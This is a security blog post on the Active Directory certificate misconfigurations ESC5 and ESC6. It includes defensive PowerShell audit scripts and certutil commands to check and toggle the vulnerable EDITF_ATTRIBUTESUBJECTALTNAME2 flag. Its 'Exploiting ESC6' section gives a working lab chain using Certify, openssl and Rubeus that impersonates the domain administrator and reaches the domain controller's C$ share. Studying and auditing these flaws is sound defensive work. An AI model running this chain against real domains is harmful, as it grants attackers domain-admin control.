T0ngMystic's Blog

"Security studying, Strive to be Security Re-Searcher. Love everything that I want to do"

AD Domain - ADCS Misconfiguration - ESC5 / ESC6


2023-11-16 / 986 words total


The alternating seasons are all telling you to move forward.

ADCS ESC misconfiguration article index:

  1. ESC1: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc1/
  2. ESC2: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc2/
  3. ESC3: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc3/
  4. ESC4: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc4/
  5. ESC5_ESC6: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc5-esc6/
  6. ESC7: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc7/
  7. ESC8: https://t0ngmystic.com/sec/ad%E5%9F%9F-adcs%E9%94%99%E8%AF%AF%E9%85%8D%E7%BD%AE-esc8/

ESC5

In "Certified Pre-Owned – Abusing Active Directory Certificate Services", ESC5 (vulnerable PKI object access control) is described as having a fairly broad scope: it is not only certificate templates and the certificate service itself, but a number of other objects whose security affects ADCS, and write access to any of them by a low-privileged principal is enough to compromise the PKI. For example:

● The CA server's AD computer object (i.e., compromise via S4U2Self or S4U2Proxy)

● The CA server's RPC/DCOM server

● Any descendant AD object or container in the container CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM> (e.g., the Certificate Templates container, the Certification Authorities container, the NTAuthCertificates object, the Enrollment Services container, etc.)


Since ESC5 covers such a broad range, I'll look into it properly later when I have some ideas.
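The check a defender wants for ESC5 is a list of who can actually write to the objects named above. The following is an added example, not code from the original post or from the Certified Pre-Owned paper: it walks the CA host's computer object and every object under CN=Public Key Services, and prints the Allow ACEs that grant write-equivalent rights to principals outside the set that holds them by default. The CA host name is an assumption for the lab in this post; the ActiveDirectory module (and its AD: drive) must be available.

```powershell
# Added example (not from the original post): list non-default principals holding
# write-equivalent rights over the objects ESC5 is concerned with, i.e. the CA host's
# computer object and everything under CN=Public Key Services in the Configuration
# partition. Run as any domain user with the ActiveDirectory module installed.
Import-Module ActiveDirectory

$caHost = 'DC1'   # assumed: computer name of the CA server in this post's lab

$configNC = (Get-ADRootDSE).configurationNamingContext
$pkiRoot  = "CN=Public Key Services,CN=Services,$configNC"

# Rights that let a principal change the object or take it over, as opposed to read it.
$writeRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty'

# Principals that hold such rights by default; anything else in the output deserves review.
$expected = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    '*\Domain Admins',
    '*\Enterprise Admins',
    'NT AUTHORITY\SELF'
)

$targets = @()
$targets += (Get-ADComputer -Filter "Name -eq '$caHost'").DistinguishedName
$targets += (Get-ADObject -SearchBase $pkiRoot -SearchScope Subtree -Filter *).DistinguishedName

foreach ($dn in $targets) {
    $acl = Get-Acl -Path "AD:\$dn"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ("$($ace.ActiveDirectoryRights)" -notmatch $writeRights) { continue }
        $who = $ace.IdentityReference.Value
        if ($expected | Where-Object { $who -like $_ }) { continue }
        [pscustomobject]@{
            Object    = $dn
            Principal = $who
            Rights    = $ace.ActiveDirectoryRights
            # All-zero GUID = right applies to the whole object; otherwise it is scoped
            # to one attribute or class (WriteProperty on a single attribute can still
            # be enough, e.g. msDS-AllowedToActOnBehalfOfOtherIdentity on the CA host).
            ObjectType = $ace.ObjectType
            Inherited  = $ace.IsInherited
        }
    }
}
```

Every row is a candidate ESC5 path, not a confirmed one: an attribute-scoped WriteProperty ACE has to be read together with its ObjectType before deciding whether it lets the principal rewrite a template, publish a CA certificate, or configure delegation on the CA host.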

ESC6

In "Certified Pre-Owned – Abusing Active Directory Certificate Services", ESC6 is the case where the CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled: whatever the template, the requester can supply an alternative name and impersonate another user. In other words, with EDITF_ATTRIBUTESUBJECTALTNAME2 on, any template that permits client authentication and that the attacker can enroll in can be exploited the same way as ESC1 (the built-in User template being the first casualty). The difference from ESC1 is that the template does not need ENROLLEE_SUPPLIES_SUBJECT: the SAN arrives as a request attribute rather than inside the CSR. One caveat: on CAs with the May 2022 update (KB5014754), issued certificates carry a SID extension for the requesting account, and a domain controller that validates it will reject a certificate whose SAN names a different account, so check the patch level of the CA and DCs before assuming this chain works.

Microsoft's own explanation is that when EDITF_ATTRIBUTESUBJECTALTNAME2 is enabled, any request can define arbitrary values in the alternative name:



Enabling and disabling EDITF_ATTRIBUTESUBJECTALTNAME2

Check on the CA server whether EDITF_ATTRIBUTESUBJECTALTNAME2 is enabled:

certutil -getreg policy\EditFlags


Enable EDITF_ATTRIBUTESUBJECTALTNAME2:

certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
or
certutil -config "DC1.t0ngmystictestad.com\t0ngmystictestad-DC1-CA" -setreg "policy\EditFlags" +EDITF_ATTRIBUTESUBJECTALTNAME2


Disable EDITF_ATTRIBUTESUBJECTALTNAME2:

certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
or
certutil -config "DC1.t0ngmystictestad.com\t0ngmystictestad-DC1-CA" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2


After enabling or disabling the flag, the service must be restarted for the change to take effect:

net stop certsvc && net start certsvc

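The certutil commands above print the flag names for you on a single CA. The following is an added example, not code from the original post: it reads the same EditFlags value that certutil -getreg policy\EditFlags reads, straight from the registry of the CA server, decodes the bits, and reports whether EDITF_ATTRIBUTESUBJECTALTNAME2 is set, so it can be dropped into a fleet audit script. Disable-Esc6 applies the fix exactly as the post does (clear the bit with certutil, restart certsvc). The flag table is the subset of EditFlags bits relevant here; the full list lives in certsrv.h.

```powershell
# Added example (not from the original post): decode the active CA's policy-module
# EditFlags from the registry and flag ESC6. Run on the CA server as an administrator.

# Subset of the EditFlags bits that certutil names; the full set is in certsrv.h.
$EditFlagNames = [ordered]@{
    0x00002  = 'EDITF_REQUESTEXTENSIONLIST'
    0x00004  = 'EDITF_DISABLEEXTENSIONLIST'
    0x00008  = 'EDITF_ADDOLDKEYUSAGE'
    0x00040  = 'EDITF_BASICCONSTRAINTSCRITICAL'
    0x00100  = 'EDITF_ENABLEAKIKEYID'
    0x00400  = 'EDITF_IGNOREREQUESTERGROUP'
    0x08000  = 'EDITF_ATTRIBUTEEKU'
    0x10000  = 'EDITF_ENABLEDEFAULTSMIME'
    0x40000  = 'EDITF_ATTRIBUTESUBJECTALTNAME2'
    0x80000  = 'EDITF_ENABLELDAPREFERRALS'
    0x100000 = 'EDITF_ENABLECHASECLIENTDC'
}
$EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x40000

function Get-CaEditFlags {
    # certutil -getreg policy\EditFlags resolves the same path: the CA named by the
    # "Active" value under Configuration, then the active policy module under it.
    $base    = 'HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration'
    $caName  = (Get-ItemProperty -Path $base -Name Active).Active
    $modules = Join-Path $base "$caName\PolicyModules"
    $module  = (Get-ItemProperty -Path $modules -Name Active).Active
    $flags   = (Get-ItemProperty -Path (Join-Path $modules $module) -Name EditFlags).EditFlags

    # A stock enterprise CA typically shows 0x11014e; with the SAN flag added it is 0x15014e.
    $set = foreach ($bit in $EditFlagNames.Keys) {
        if ($flags -band $bit) { $EditFlagNames[$bit] }
    }
    [pscustomobject]@{
        CA        = $caName
        EditFlags = '0x{0:x} ({1})' -f $flags, $flags
        Flags     = $set
        ESC6      = [bool]($flags -band $EDITF_ATTRIBUTESUBJECTALTNAME2)
    }
}

function Disable-Esc6 {
    # Same as the certutil command in the post; the CA only rereads EditFlags on restart.
    certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2 | Out-Null
    Restart-Service certsvc
    Get-CaEditFlags
}

Get-CaEditFlags
```

Run Get-CaEditFlags before and after Disable-Esc6 and confirm ESC6 flips to False; if it stays True after the restart, the value was set on a different CA instance than the one named by the Active value, which is the case the -config form of certutil above is for.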


Exploiting ESC6

Detect whether EDITF_ATTRIBUTESUBJECTALTNAME2 is enabled:

Certify.exe find /vulnerable


Set the alternative name to administrator and enroll for a User certificate under the administrator identity:

Certify.exe request /ca:DC1.t0ngmystictestad.com\t0ngmystictestad-DC1-CA /template:User /altname:administrator


Convert the certificate to PFX format:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx


Request a TGT with Rubeus and inject it into memory:

Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.111.11 /ptt


Successfully access the domain controller as the domain admin administrator:

dir \\dc1.t0ngmystictestad.com\c$


My writing is poor and my skills are lacking; corrections from the masters are very welcome, many thanks!


If this article helped you, feel free to follow the official account. Thank you for your support!